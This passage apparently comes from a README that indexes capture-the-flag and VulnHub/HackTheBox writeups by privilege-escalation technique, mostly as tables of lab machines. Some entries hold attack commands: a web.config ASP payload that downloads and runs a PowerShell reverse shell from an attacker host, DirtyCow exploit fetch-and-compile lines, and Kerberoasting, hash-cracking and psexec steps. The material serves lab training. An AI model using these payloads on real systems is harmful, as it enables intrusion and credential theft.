[`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_cron_rootjobs"></a> #### privesc_cron_rootjobs [⇡](#privesc) it would be useful to find `root` owned cronjob processes ```shell pspy # find root owned processes, cronjobs find / -type f -mmin -60 -ls 2>/dev/null # look for recently modified files since a user may not be able to see cron jobs by root ./CheckcronJob.sh # find background processes ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | [+] https://www.reddit.com/r/oscp/comments/gb4k83/htb_bashed_and_my_learnings_oscp_journey/ --- <a name="privesc_ctf_usertxt_timestamp"></a> #### privesc_ctf_usertxt_timestamp [⇡](#privesc) a neat trick for ctf boxes is to use `user.txt` file time as a reference to search for recently modified files ```shell ls -lh /home/<username>/user.txt ``` [+] https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959/19 --- <a name="privesc_dirtycow"></a> #### privesc_dirtycow [⇡](#privesc) race condition that allows breakage of private read-only memory mappings ```shell wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c gcc -pthread -o dc dc.c -lcrypt ./dc ``` [+] https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs --- <a name="privesc_docker_group"></a> #### privesc_docker_group [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | --- <a name="privesc_env_relative_path"></a> #### privesc_env_relative_path [⇡](#privesc) certain files when referenced without their complete path, can be misused to gain elevated privileges. this can be done by modifying the environment path to find the referenced file within a directory under attacker's control and placing a malicious binary within that directory with the same name as the referenced file | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | [+] https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/ --- <a name="privesc_freebsd"></a> #### privesc_freebsd [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | --- <a name="privesc_iis_webconfig"></a> #### privesc_iis_webconfig [⇡](#privesc) on iis servers, the web.config file stores configuration data for web applications (similar to .htaccess on apacher server). it can contain asp code which will be executed by the web server. use the powershell reverse shell from [nishang framework](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to get a call back from uploaded web.config file ```shell sample web.config: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <%@ Language=VBScript %> <% call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('<attackerip>/Invoke-PowerShellTcp.ps1')") %> ``` [+] https://0xdf.gitlab.io/2018/10/27/htb-bounty.html --- <a name="privesc_kerberos_kerberosting"></a> #### privesc_kerberos_kerberosting [⇡](#privesc) allows us to extract administrator tickets and crack those to obtain administrator password ```shell # add entry for target system within /etc/hosts GetUserSPNs.py -request active.htb/SVC_TGS -outputfile ./adminticket john --format=krb5tgs --wordlist /usr/share/wordlists/rockyou.txt ./adminticket # does not work on john v1.8.0.6-jumbo-1-bleeding psexec.py [email protected] ``` [+] https://0xrick.github.io/hack-the-box/active/ [+] https://room362.com/post/2016/kerberoast-pt1/ [+] https://room362.com/post/2016/kerberoast-pt2/ [+] https://room362.com/post/2016/kerberoast-pt3/ --- <a name="privesc_kernel_ipappend"></a> #### privesc_kernel_ipappend [⇡](#privesc) Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5/4.8 / Fedora Core 4/5/6 x86) ```shell gcc -m32 -o exploit 9542.c -Wl,--hash-style=both ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | [+] https://www.exploit-db.com/exploits/9542 [+] https://nvd.nist.gov/vuln/detail/CVE-2009-2698 --- <a name="privesc_kernel_overlayfs"></a> #### privesc_kernel_overlayfs [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_lxc_bash"></a> #### privesc_lxc_bash [⇡](#privesc) ```shell check output of id command if user is member of lxd group, follow https://reboare.github.io/lxd/lxd-escape.html ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | --- <a name="privesc_modssl"></a> #### privesc_modssl [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100" /> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | --- <a name="privesc_mysql_creds"></a> #### privesc_mysql_creds [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 2. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 3. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | --- <a name="privesc_mysql_root"></a> #### privesc_mysql_root [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 2. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_mysql_udf"></a> #### privesc_mysql_udf [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 2. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_nfs_norootsquash"></a> #### privesc_nfs_norootsquash [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="privesc_nmap"></a> #### privesc_nmap [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 2. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | --- <a name="privesc_passwd_writable"></a> #### privesc_passwd_writable [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | --- <a name="privesc_psexec_login"></a> #### privesc_psexec_login [⇡](#privesc) If credentials for an administrative user are available, we can use `psexec.py` to connect and gain elevated access to the target system. ```shell psexec <username>@<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="privesc_setuid"></a> #### privesc_setuid [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 2. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 3. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 5. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 6. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_shell_escape"></a> #### privesc_shell_escape [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_ssh_authorizedkeys"></a> #### privesc_ssh_authorizedkeys [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="privesc_ssh_knownhosts"></a> #### privesc_ssh_knownhosts [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Moria: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf) | [vh#187](https://www.vulnhub.com/entry/moria-11,187/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png" width="100" height="100" /> | [`privesc_ssh_knownhosts`](https://github.com/7h3rAm/writeups#privesc_ssh_knownhosts) | --- <a name="privesc_strace_setuid"></a> #### privesc_strace_setuid [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | --- <a name="privesc_sudo"></a> #### privesc_sudo [⇡](#privesc) using `sudo` to execute programs that run with elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 4. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 5. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 6. | [Brainpan: 